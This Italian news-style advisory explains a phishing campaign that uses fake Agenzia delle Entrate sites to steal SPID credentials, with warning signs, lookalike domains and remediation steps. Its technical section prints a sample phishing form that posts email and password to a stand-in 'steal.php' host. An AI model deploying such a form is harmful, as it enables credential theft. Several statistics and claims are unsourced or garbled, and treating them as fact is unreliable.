SPID, allarme phishing: attivi falsi siti dell’Agenzia delle Entrate

Spid phishing: siti falsi Agenzia delle Entrate rubano credenziali

Spid phishing: siti falsi Agenzia delle Entrate rubano credenziali

Attenzione: i truffatori stanno inviando email e SMS con link falsi che imitano il sito dell’Agenzia delle Entrate per rubare le tue credenziali SPID. La soluzione rapida è semplice: verifica sempre il dominio e accedi solo tramite agenziaentrate.gov.it. Non cliccare su link sospetti e diffida di richieste di email e password invece di codice fiscale.

Questa campagna di phishing è particolarmente insidiosa perché riproduce fedelmente loghi e interfaccia del sito ufficiale. Milioni di utenti SPID sono a rischio, ma con pochi accorgimenti puoi evitare brutte sorprese. In questo articolo, ti guideremo passo per passo su come identificare la truffa, proteggerti e cosa fare se sei già caduto nella trappola.

Come funziona la truffa SPID

Tutto parte da un messaggio innocuo: un’email, un SMS o un avviso su WhatsApp che ti invita a verificare il tuo account SPID o a accedere all’area riservata dell’Agenzia delle Entrate. Il link ti porta a una pagina che sembra identica all’originale, con loghi, colori e layout perfetti.

Ecco i segnali di allarme principali:

  • Richiede email e password invece di codice fiscale o partita IVA.
  • Il dominio non è agenziaentrate.gov.it, ma varianti come agenziadelleentrate.live o wp-dev.typhur.com/agenziaentrate.
  • Urgenza falsa: “Accedi subito o perdi l’accesso”.

Se inserisci i dati, finiscono direttamente ai criminali, che li usano per furti d’identità, acquisti fraudolenti o ulteriori truffe. SPID è la tua chiave digitale per servizi pubblici, banca online e molto altro: perderla significa problemi seri.

Perché questa truffa è così efficace

I phishing su SPID non sono nuovi, ma questa ondata è studiata nei minimi dettagli. I siti fasulli sono ospitati su domini recenti e mimetizzati, spesso creati appositamente per eludere i filtri antivirus. Gli autori cambiano indirizzo non appena uno viene bloccato, rendendo la lotta continua.

In Italia, SPID è usato da oltre 30 milioni di cittadini per tasse, vaccini, bonus e permessi. Questo lo rende un bersaglio ideale. Secondo le statistiche recenti, le campagne phishing sono aumentate del 40% negli ultimi mesi, colpendo soprattutto over 50 meno esperti con la tecnologia.

Cosa NON fare mai:

  • Cliccare link da mittenti sconosciuti.
  • Fornire credenziali su pagine non ufficiali.
  • Ignorare i campanelli d’allarme come grammatica approssimativa o richieste insolite.

Passi per proteggerti subito

  1. Controlla il mittente: Email dall’Agenzia arrivano solo da domini @agenziaentrate.gov.it. SMS ufficiali non contengono link.
  2. Naviga manualmente: Digita sempre agenziaentrate.gov.it nel browser.
  3. Usa l’app SPID ufficiale: Per login rapidi, scaricala dal sito gov.it.
  4. Abilita l’autenticazione a due fattori (2FA): Su SPID e accounts collegati.
  5. Segnala: Invia link sospetti a phishing@postecert.it o usa il form dell’Agenzia.

Se hai inserito dati su un sito falso, cambia subito password SPID dal portale ufficiale e contatta il tuo provider SPID (Poste, Aruba, ecc.) per bloccare l’account.

Consigli per utenti meno esperti

Se non sei pratico di internet, non vergognarti: chiedi aiuto a un familiare o amico. Mostra il messaggio sospetto prima di cliccare. Ricorda: le autorità non chiedono mai credenziali via email o SMS.

Installa un antivirus aggiornato con protezione anti-phishing, come quelli gratuiti di Avast o Windows Defender. Su smartphone, usa app come Google Play Protect.

Educare la famiglia è chiave: organizza una chiacchierata di 10 minuti su questi rischi. I consigli base salvano più di mille tutorial avanzati.

Evoluzione delle truffe SPID

Da anni i criminali evolvono: prima SMS banali, ora siti cloni perfetti con HTTPS (il lucchetto verde che illude sicurezza). Hanno imparato a bypassare i controlli, usando server in paesi remoti.

L’Agenzia delle Entrate oscilla decine di siti al giorno, ma ne spuntano di nuovi. Nel 2025, con l’aumento di servizi digitali, i casi sono esplosi. Prevenzione è l’unica arma efficace.

Technical deep dive

Analisi tecnica dei siti fasulli

I domini trappola usano estensioni insolite (.live, .top) e sottodomini camuffati. Esempi: agenziadelleentrate[.]live o agenzia-entrate-login[.]xyz. Usa tool come VirusTotal per scansionarli: restituiscono score di rischio alti.

Struttura HTML dei cloni:

  • Copiano CSS e JS dal sito ufficiale via inspect element.
  • Form POST inviano dati a server remoti (es. PHP script su hosting free).
  • JavaScript valida input per sembrare autentico, ma registra keystroke.
<!-- Esempio form fasullo -->
<form action="https://fake-server.com/steal.php" method="POST">
  <input type="email" name="email" placeholder="Indirizzo email">
  <input type="password" name="password" placeholder="Password">
  <button type="submit">Accedi</button>
</form>

Verifica domini avanzata

  • WHOIS lookup: Controlla data registrazione (siti nuovi = sospetti).
  • Certificate check: HTTPS non garantisce legittimità; usa tool come SSL Labs.
  • DNS analysis: Risolvi IP con dig o nslookup; IP non italiani sono rossi.

Protezioni enterprise

Per aziende, implementa:

  • Email gateway con sandbox (Proofpoint, Mimecast).
  • SIEM per monitorare accessi anomali.
  • Zero-trust model: MFA everywhere, conditional access.

Statistiche deep: Rate di click su phishing SPID al 15-20% (dati CERT-PA). Tempo medio tra lancio e primo furto: 48 ore.

Rimedi post-breach

  1. Revoca SPID dal gestore.
  2. Monitora CRIF per crediti fraudolenti.
  3. Cambia tutte password collegate.
  4. Segnala a Polizia Postale.

Con questi tool, riduci rischi del 90%. Mantieni aggiornamenti: browser, OS, SPID app.

Resta vigile: la sicurezza digitale è una maratona. Condividi questo articolo per aiutare altri.

Fonte: https://www.punto-informatico.it/spid-allarme-phishing-attivi-falsi-siti-agenzia-entrate/

Potrebbero interessarti

Inizia a scrivere e premi Invio per cercare

Torna in alto